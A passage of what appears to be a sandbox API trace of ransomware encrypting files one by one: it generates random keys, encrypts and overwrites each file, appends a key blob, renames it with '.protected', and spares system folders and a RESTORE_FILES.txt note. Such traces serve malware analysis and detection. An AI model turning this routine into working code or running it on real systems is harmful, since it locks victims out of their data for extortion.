dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.597] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 100 [0085.597] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".txt") returned 0x0 [0085.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 100 [0085.597] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".rar") returned 0x0 [0085.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 100 [0085.597] StrStrW (lpFirst="Orange Circles.htm", lpSrch=".zip") returned 0x0 [0085.597] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0085.598] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.598] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xed, lpOverlapped=0x0) returned 1 [0085.599] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.599] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.599] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.599] CloseHandle (hObject=0x150) returned 1 [0085.600] 
wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.protected") returned 110 [0085.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm.protected")) returned 1 [0085.601] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.601] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Windows") returned -1 [0085.601] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Program Files") returned -1 [0085.601] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="Program Files (x86)") returned -1 [0085.601] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="$Recycle.bin") returned 1 [0085.601] lstrcmpiW (lpString1="OrangeCircles.jpg", lpString2="System Volume Information") returned -1 [0085.601] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 99 [0085.601] StrStrIW (lpFirst="OrangeCircles.jpg", lpSrch=".protected") returned 0x0 [0085.601] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0085.601] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.601] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, 
dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.601] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 99 [0085.606] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".txt") returned 0x0 [0085.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 99 [0085.606] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".rar") returned 0x0 [0085.606] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 99 [0085.606] StrStrW (lpFirst="OrangeCircles.jpg", lpSrch=".zip") returned 0x0 [0085.606] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x18ed, lpOverlapped=0x0) returned 1 [0085.624] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffe713, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.624] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x18ed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x18ed, lpOverlapped=0x0) returned 1 [0085.625] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.625] 
WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.625] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.625] CloseHandle (hObject=0x150) returned 1 [0085.626] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.protected") returned 109 [0085.626] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg.protected")) returned 1 [0085.627] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.627] lstrcmpiW (lpString1="Peacock.htm", lpString2="Windows") returned -1 [0085.627] lstrcmpiW (lpString1="Peacock.htm", lpString2="Program Files") returned -1 [0085.627] lstrcmpiW (lpString1="Peacock.htm", lpString2="Program Files (x86)") returned -1 [0085.627] lstrcmpiW (lpString1="Peacock.htm", lpString2="$Recycle.bin") returned 1 [0085.627] lstrcmpiW (lpString1="Peacock.htm", lpString2="System Volume Information") returned -1 [0085.627] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 93 [0085.627] StrStrIW (lpFirst="Peacock.htm", lpSrch=".protected") returned 0x0 [0085.627] lstrcmpW (lpString1="Peacock.htm", lpString2="RESTORE_FILES.txt") returned -1 [0085.627] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.627] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.627] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 93 [0085.628] StrStrW (lpFirst="Peacock.htm", lpSrch=".txt") returned 0x0 [0085.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 93 [0085.628] StrStrW (lpFirst="Peacock.htm", lpSrch=".rar") returned 0x0 [0085.628] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 93 [0085.628] StrStrW (lpFirst="Peacock.htm", lpSrch=".zip") returned 0x0 [0085.628] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0085.629] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff18, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 
| out: lpNewFilePointer=0xffffffff) returned 1 [0085.629] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xe8, lpOverlapped=0x0) returned 1 [0085.654] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.654] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.654] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.654] CloseHandle (hObject=0x150) returned 1 [0085.658] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.protected") returned 103 [0085.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm.protected")) returned 1 [0085.664] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.664] lstrcmpiW (lpString1="Peacock.jpg", lpString2="Windows") returned -1 [0085.664] lstrcmpiW (lpString1="Peacock.jpg", lpString2="Program Files") returned -1 [0085.664] 
lstrcmpiW (lpString1="Peacock.jpg", lpString2="Program Files (x86)") returned -1 [0085.664] lstrcmpiW (lpString1="Peacock.jpg", lpString2="$Recycle.bin") returned 1 [0085.664] lstrcmpiW (lpString1="Peacock.jpg", lpString2="System Volume Information") returned -1 [0085.664] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 93 [0085.664] StrStrIW (lpFirst="Peacock.jpg", lpSrch=".protected") returned 0x0 [0085.664] lstrcmpW (lpString1="Peacock.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0085.664] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.664] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.664] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.665] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 93 [0085.665] StrStrW (lpFirst="Peacock.jpg", lpSrch=".txt") returned 0x0 [0085.665] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 93 [0085.665] StrStrW (lpFirst="Peacock.jpg", lpSrch=".rar") returned 0x0 [0085.665] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 93 [0085.665] StrStrW 
(lpFirst="Peacock.jpg", lpSrch=".zip") returned 0x0 [0085.665] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x13fb, lpOverlapped=0x0) returned 1 [0085.750] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffec05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.750] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x13fb, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x13fb, lpOverlapped=0x0) returned 1 [0085.783] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.783] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.783] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.783] CloseHandle (hObject=0x150) returned 1 [0085.784] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.protected") returned 103 [0085.784] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg.protected" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg.protected")) returned 1 [0085.785] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.785] lstrcmpiW (lpString1="Roses.htm", lpString2="Windows") returned -1 [0085.785] lstrcmpiW (lpString1="Roses.htm", lpString2="Program Files") returned 1 [0085.785] lstrcmpiW (lpString1="Roses.htm", lpString2="Program Files (x86)") returned 1 [0085.785] lstrcmpiW (lpString1="Roses.htm", lpString2="$Recycle.bin") returned 1 [0085.785] lstrcmpiW (lpString1="Roses.htm", lpString2="System Volume Information") returned -1 [0085.785] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 91 [0085.785] StrStrIW (lpFirst="Roses.htm", lpSrch=".protected") returned 0x0 [0085.785] lstrcmpW (lpString1="Roses.htm", lpString2="RESTORE_FILES.txt") returned 1 [0085.785] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.785] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.786] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 91 [0085.786] StrStrW (lpFirst="Roses.htm", lpSrch=".txt") returned 0x0 [0085.786] 
lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 91 [0085.786] StrStrW (lpFirst="Roses.htm", lpSrch=".rar") returned 0x0 [0085.786] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 91 [0085.786] StrStrW (lpFirst="Roses.htm", lpSrch=".zip") returned 0x0 [0085.786] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0xe9, lpOverlapped=0x0) returned 1 [0085.787] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffff17, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.787] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xe9, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0xe9, lpOverlapped=0x0) returned 1 [0085.788] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.788] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.788] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0085.788] CloseHandle (hObject=0x150) returned 1 [0085.789] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.protected") returned 101 [0085.789] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm.protected")) returned 1 [0085.789] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0085.790] lstrcmpiW (lpString1="Roses.jpg", lpString2="Windows") returned -1 [0085.790] lstrcmpiW (lpString1="Roses.jpg", lpString2="Program Files") returned 1 [0085.790] lstrcmpiW (lpString1="Roses.jpg", lpString2="Program Files (x86)") returned 1 [0085.790] lstrcmpiW (lpString1="Roses.jpg", lpString2="$Recycle.bin") returned 1 [0085.790] lstrcmpiW (lpString1="Roses.jpg", lpString2="System Volume Information") returned -1 [0085.790] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 91 [0085.790] StrStrIW (lpFirst="Roses.jpg", lpSrch=".protected") returned 0x0 [0085.790] lstrcmpW (lpString1="Roses.jpg", lpString2="RESTORE_FILES.txt") returned 1 [0085.790] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0085.790] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0085.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 91 [0085.791] StrStrW (lpFirst="Roses.jpg", lpSrch=".txt") returned 0x0 [0085.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 91 [0085.791] StrStrW (lpFirst="Roses.jpg", lpSrch=".rar") returned 0x0 [0085.791] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 91 [0085.791] StrStrW (lpFirst="Roses.jpg", lpSrch=".zip") returned 0x0 [0085.791] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x780, lpOverlapped=0x0) returned 1 [0085.800] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff880, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.800] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x780, lpOverlapped=0x0) returned 1 [0085.801] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.801] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0085.801] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
